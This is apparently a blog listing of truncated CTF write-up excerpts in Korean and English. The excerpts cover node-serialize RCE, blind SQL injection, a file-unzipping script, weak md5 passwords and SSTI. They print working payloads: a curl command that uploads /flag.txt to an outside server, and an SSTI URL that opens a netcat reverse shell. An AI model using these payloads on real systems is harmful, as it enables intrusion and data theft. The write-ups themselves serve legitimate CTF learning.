Only Exploit Code.. sparta - node-serialize rce # https://www.exploit-db.com/exploits/49552 import requests import re import base64 import sys url = 'http://web.zh3r0.cf:6666/guest' # change this payload = """function(){require('child_process').exec('curl -F file1=@/flag.txt server:1234',function(error, stdout, stderr){return stdout;});}()""" # rce = "_$$ND_FUNC$$_process.exit(0)" # code ="_$$ND..
Team Alpray
1. SQL injection 2. file upload -> rcesql_exploit.py import requests import string import time url = 'http://vkl-sql.darkarmy.xyz/login.php' table_name = '' strings = 'abcdefghijklmnopqrstuvwxyzABCDEFGHJIJKLMNOPQRSTUVWXYZ1234567890{}' for i in range(1,80): for j in strings: #data = {'username':'admin" and if(ascii(substr((select schema_name from information_sc..
LAYER7 CTF Writeup - as3617 mic check - MISC (100pts) 개발자도구로 description 영역을 확인해보면 플래그가 있다. FLAG : LAYER7{SunriNIN73rN3thIGHScHOO1layEr7} zipzipzipzipzip - MISC (100pts) 압축파일을 열어보면 안에 또 압축파일이 있는데 손으로 하기 귀찮아서 shell script로 빠르게 풀었다. while [ "`find . -type f -name '*.zip' | wc -l`" -gt 0 ] do find . -type f -name "*.zip" -exec unzip -- '{}' \; -exec rm -- '{}' \; done 압축파일이 있는 폴더로 가서 위의 스크립트를 실행하면 ..
보호되어 있는 글입니다.
Migration 두 개의 링크를 주고 있다. http://migration.sstf.site:5555/ http://migration.sstf.site:7777/ 첫번째 링크에는 register가 포함되있고 두번째 링크는 로그인 후 admin 페이지를 제공해준다. 문제에서 주어진 파일을 보면 user의 정보를 포함하고 있는데 아래와 같이 이루어져 있다. idx user_id password 1 user1 c4ca4238a0b923820dcc509a6f75849b 2 user2 c81e728d9d4c2f636f067f89cc14862c 이때 password는 md5해쉬로 이루어져 있었고 user1의 password가 1인걸로 봐선 나머지 유저의 password도 id에 붙어있는 숫자라는 것을 추측해낼 수..
ascii-inbox The problem is giving two websites. 1.https://challs.m0lecon.it:8003/ - Inbox 2.https://challs.m0lecon.it:8004/ - Ascii The discription gave me 404 pages as a hint. I immediately thought of a ssti and tried an attack. I tried reverse shell and I could get shell. https://challs.m0lecon.it:8004/{{url_for.__globals__.os.popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip por..